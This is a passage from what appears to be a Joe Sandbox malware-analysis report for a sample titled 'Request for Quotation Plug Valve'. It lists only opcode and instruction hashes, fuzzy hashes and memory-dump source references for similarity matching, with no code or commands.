                                                                                      • Opcode ID: 3bfa3dae296c9eceed7a295a9e44e877774467d5f877a0fe91382cea704ebfb1
                                                                                      • Instruction ID: 32c9f8685e995f7833ed402ca5d42452e14b389fe376aa00e5ad834801c9d162
                                                                                      • Opcode Fuzzy Hash: 3bfa3dae296c9eceed7a295a9e44e877774467d5f877a0fe91382cea704ebfb1
                                                                                      • Instruction Fuzzy Hash: 3BC1B278E01218CFEB54DFA9C984B9DBBB2BF89300F1081A9D419AB355DB759E81CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 415bf5a7a59aa114b4e599fe41c8042542db201e88a79fe3de9bdee8d48d74ee
                                                                                      • Instruction ID: 9cd6e1a6c7af0577157b6b07aaa79e6aa8dcf5d56c6096440d3813b7e9dd6c46
                                                                                      • Opcode Fuzzy Hash: 415bf5a7a59aa114b4e599fe41c8042542db201e88a79fe3de9bdee8d48d74ee
                                                                                      • Instruction Fuzzy Hash: E9C1B278E01218CFEB54DFA9C984B9DBBB2BF89300F1081A9D419AB355DB359E81CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e9330f231dfc1f1b0f19bb61d89ae7f34fd7334a2fb8d6a47d5a0477f3d24b8b
                                                                                      • Instruction ID: 0691ea5faedac3689a8320c7a4f311c20b696a56cf4dda90250519c1967da2ba
                                                                                      • Opcode Fuzzy Hash: e9330f231dfc1f1b0f19bb61d89ae7f34fd7334a2fb8d6a47d5a0477f3d24b8b
                                                                                      • Instruction Fuzzy Hash: 57C1C278E01218CFEB54DFA9C984B9DBBB2BF89300F1080A9D419AB355DB759E85CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8876af06761eb6e9b54d29cc2ec52c0427b6bd3ad3072a71176ab6a82511c261
                                                                                      • Instruction ID: f539119f288bfd71edd0f806d67d141e80418bcee0d7aea97dff79ebb23d77de
                                                                                      • Opcode Fuzzy Hash: 8876af06761eb6e9b54d29cc2ec52c0427b6bd3ad3072a71176ab6a82511c261
                                                                                      • Instruction Fuzzy Hash: 59C1C274E01218CFEB54DFA9C984B9DBBB2BF89304F1080A9D419AB355DB359E85CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2a5600effd47958e2f9b1e45406b34e2481d9b01acf058e12b441b2e01e6b0e9
                                                                                      • Instruction ID: 6c97636c8dd475e32b0e10202a3523b23ac18d2c84eda2a2cbdaa883463653f7
                                                                                      • Opcode Fuzzy Hash: 2a5600effd47958e2f9b1e45406b34e2481d9b01acf058e12b441b2e01e6b0e9
                                                                                      • Instruction Fuzzy Hash: 41C1C374E01218CFEB54DFA9C984B9DBBB2BF89300F2081A9D819AB355DB355E81CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0310546946b863d6d6995a769fc009efcfa385ae2f68f934585cc687e54680d2
                                                                                      • Instruction ID: 681162d5945653734112ba25677fe1b2c99c85dd03149be6960d2ce05646bfb3
                                                                                      • Opcode Fuzzy Hash: 0310546946b863d6d6995a769fc009efcfa385ae2f68f934585cc687e54680d2
                                                                                      • Instruction Fuzzy Hash: A3C1C278E01218CFEB54DFA9C984B9DBBB2BF89300F1081A9D409AB355DB759E85CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 36f84a777d5ae0469cb5afd386a5683d18a3e80184c3cbf619773abc34ced99c
                                                                                      • Instruction ID: 6f5d1fb136fb1689bf566ae3ca431423a8b04aa1fbd9d9248929434205df7734
                                                                                      • Opcode Fuzzy Hash: 36f84a777d5ae0469cb5afd386a5683d18a3e80184c3cbf619773abc34ced99c
                                                                                      • Instruction Fuzzy Hash: 4DC1B178E01218CFEB54DFA9C994B9DBBB2BF89300F1080A9D419AB355DB359E85CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f4179a1d1025c72139f62ad65f9ac71c247072850e93e1d0d200e5677d4fe279
                                                                                      • Instruction ID: ab9b8265c20da7013b069d7583050744b56c9a9ae14ea702619cecc11eb49170
                                                                                      • Opcode Fuzzy Hash: f4179a1d1025c72139f62ad65f9ac71c247072850e93e1d0d200e5677d4fe279
                                                                                      • Instruction Fuzzy Hash: FA91D271E006188BDF68DFBAC9442ADBAF3AFC9314F10852AD425E7395DB708D02CB90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b809be141530fc313792e8f099380d462316b3586c70413a1c860c2dbdb97b34
                                                                                      • Instruction ID: 96c998fb7a59c8fabf3596394c64fafd1a62b3b531ad02a89939221abb797de0
                                                                                      • Opcode Fuzzy Hash: b809be141530fc313792e8f099380d462316b3586c70413a1c860c2dbdb97b34
                                                                                      • Instruction Fuzzy Hash: 30A10571D106598FDB14DFA9C8447DDFBB1EF8A304F14C2AAE458A7260EB709A85CF81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8b98f6ddd101e94d951ed19f2b51f65595cc25e39d85041a74a7cc736dffdefd
                                                                                      • Instruction ID: 21dbf528599c0169a0ac178d81c08d12a6d87f0c6e41d85961c1e2b4e8ae00a2
                                                                                      • Opcode Fuzzy Hash: 8b98f6ddd101e94d951ed19f2b51f65595cc25e39d85041a74a7cc736dffdefd
                                                                                      • Instruction Fuzzy Hash: CB81B074E01218CFEB59DFE9D980BADBBB2BF89300F208129D815AB359DB755942CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2cc318d5ec2c4bc6678325f80fd9a999e9592ec98c965dfa0cb2b570c9603679
                                                                                      • Instruction ID: 022c18c231a86989dc7023b825ed674ae874e160963f4b0b603e49cf0efee916
                                                                                      • Opcode Fuzzy Hash: 2cc318d5ec2c4bc6678325f80fd9a999e9592ec98c965dfa0cb2b570c9603679
                                                                                      • Instruction Fuzzy Hash: A171F674D01259CFDB29DFA6D940BADBBB2FF89304F1080A9C848A765ADB315D85DF40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f69f9efca7fd15c42106b918202e5208c155261cc1e94cf8e32bff93e4b67c20
                                                                                      • Instruction ID: d29b6bc1e959c25cebb16ed7fc9512554f808ed9207bfc73ba28bb381d98f1b5
                                                                                      • Opcode Fuzzy Hash: f69f9efca7fd15c42106b918202e5208c155261cc1e94cf8e32bff93e4b67c20
                                                                                      • Instruction Fuzzy Hash: A74108B1D016589BEB18CFAAD8843CEFBF2BF89314F14C12AD418AB294DBB44585CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dbadb36a9422e1d282335755785844053273f0e5ef80d2b1360202dbfda9e222
                                                                                      • Instruction ID: 5495771e7093eab89dfe4d48026112c6c2a5e4e07a403be1af3e270480d5945c
                                                                                      • Opcode Fuzzy Hash: dbadb36a9422e1d282335755785844053273f0e5ef80d2b1360202dbfda9e222
                                                                                      • Instruction Fuzzy Hash: 28414774E012488FDB58DFBAC95079DBBF2AF8A300F14C12AC514AB259DB34594ACF00
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 22f1c299ac391c08d5eeeaec40eec9ee3d1d54ff5dd7a66c4dba093b991ea3ef
                                                                                      • Instruction ID: 1ef0395675f5c16a5e229a842ca9adc39a23c137568632a0ca8754ff0407ff25
                                                                                      • Opcode Fuzzy Hash: 22f1c299ac391c08d5eeeaec40eec9ee3d1d54ff5dd7a66c4dba093b991ea3ef
                                                                                      • Instruction Fuzzy Hash: 3541F575E01248CBEB58DFAAD94079EFBF2AF89304F20C12AC415BB258DB345946CF40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 610e83e6198170e1e52ddb5fe95732c5965c8f7aa2b4b5b847f758cdf0fb45bc
                                                                                      • Instruction ID: abeed9586fcbd968d6e0f92848344b406e43c76578a75f675b6da0e851fc018b
                                                                                      • Opcode Fuzzy Hash: 610e83e6198170e1e52ddb5fe95732c5965c8f7aa2b4b5b847f758cdf0fb45bc
                                                                                      • Instruction Fuzzy Hash: 7D41B574E012488BDB58DFAAD9447DEFBB2AF89300F24D129C415BB254DB355946CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1f22d564f482cc345498398be5a13066236c680e07123e29c5027798503baf6e
                                                                                      • Instruction ID: 976898881e56cdc6d4d83733a674c40e8b5d2edaaecab2d4612e2d9e3dca6527
                                                                                      • Opcode Fuzzy Hash: 1f22d564f482cc345498398be5a13066236c680e07123e29c5027798503baf6e
                                                                                      • Instruction Fuzzy Hash: F341E474E01248CBEB58DFAAD95469DFBF2BF8A300F24C129C525BB268DB345946CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 591da21b9234db1aa86253a9c325dac309501e6be9e9442f972bd50620a10734
                                                                                      • Instruction ID: 1496a0ff4f5c2e38bae7bff0f0d5389f3c165304042b574ed30b94d818735433
                                                                                      • Opcode Fuzzy Hash: 591da21b9234db1aa86253a9c325dac309501e6be9e9442f972bd50620a10734
                                                                                      • Instruction Fuzzy Hash: 2B41E474E012488BEB58DFAAD94079DFBF2BF89300F20D129C515BB268DB345946CF40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1c4e841454fcfdb77b2fb04ec2e8dfe3cbc857e844cfb44fc48aa7de5e3d44c4
                                                                                      • Instruction ID: 01ca04c9debabe37610f6c7e23cde93c09678052c9832aac43213d63e448c3c8
                                                                                      • Opcode Fuzzy Hash: 1c4e841454fcfdb77b2fb04ec2e8dfe3cbc857e844cfb44fc48aa7de5e3d44c4
                                                                                      • Instruction Fuzzy Hash: BF41E2B5E012488BEB58DFAAD95479DFBB2AF8A300F20C12AC415BB258DB345946CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 50917953df3f66e3de96bcec2d2e2f4ed336c79e6d7d68c2606da6910dca3a0d
                                                                                      • Instruction ID: dfbc84bfe9fc2bda4c83bb334e6e9ee075ff3333b75772e057dbe3ea0554bef3
                                                                                      • Opcode Fuzzy Hash: 50917953df3f66e3de96bcec2d2e2f4ed336c79e6d7d68c2606da6910dca3a0d
                                                                                      • Instruction Fuzzy Hash: E441F574E01248CBEB58DFAAD9506DDFBF2AF8A300F24C169C415AB258DB345946CF40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ebae6991f1ec191c2a26c59b0614c4faa11e7031136243b81c1a121bf7c5b71d
                                                                                      • Instruction ID: 3ca20b96911569ac5869dcacb249296bb9715646eb50a17f1ff11fd9742d38b6
                                                                                      • Opcode Fuzzy Hash: ebae6991f1ec191c2a26c59b0614c4faa11e7031136243b81c1a121bf7c5b71d
                                                                                      • Instruction Fuzzy Hash: FB41C474E016488BEB58DFAAD9547ADBBF2BF89300F24D129C415BB258DB345946CF40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1812606ca2479b886d0242a7a961d93a2fce4564cf78592397e6715fc6a68a30
                                                                                      • Instruction ID: 78b898ec6acb8eb8454bab0d393d4aa0a436465f544f72e37f3f52e75f75f57b
                                                                                      • Opcode Fuzzy Hash: 1812606ca2479b886d0242a7a961d93a2fce4564cf78592397e6715fc6a68a30
                                                                                      • Instruction Fuzzy Hash: 5841D5B4D012488BEB58DFAAD95069DBBF2BF8A300F24C12AC419BB259DB355946CF40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 77f2cd1d06a9b59230fa3dfbc5d2ddc2a50cb924aab4487c0d61e23451245e62
                                                                                      • Instruction ID: ed007953121e9786265f7716f76bdcf0c5d24885d7c66a2e35b1861dca72075c
                                                                                      • Opcode Fuzzy Hash: 77f2cd1d06a9b59230fa3dfbc5d2ddc2a50cb924aab4487c0d61e23451245e62
                                                                                      • Instruction Fuzzy Hash: 5941D474E012488BEB58DFAAD9447ADFBF2BF89300F24D12AC415BB258DB355945CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.4713092013.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_68e0000_Request for Quotation Plug Valve.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 43e83279c80ab2860fa21340519ab9426f15914c80b47ddfa110a4f1dfc1b0a1
                                                                                      • Instruction ID: 9c2456452ec87723dddc99629552ec2549fbbd7b3a6b964ba04af3951c693743
                                                                                      • Opcode Fuzzy Hash: 43e83279c80ab2860fa21340519ab9426f15914c80b47ddfa110a4f1dfc1b0a1
                                                                                      • Instruction Fuzzy Hash: 0E31C674E012588FDB58DFAAD8406EEBBB2BF8A300F14D12AD415BB254DB745946CF50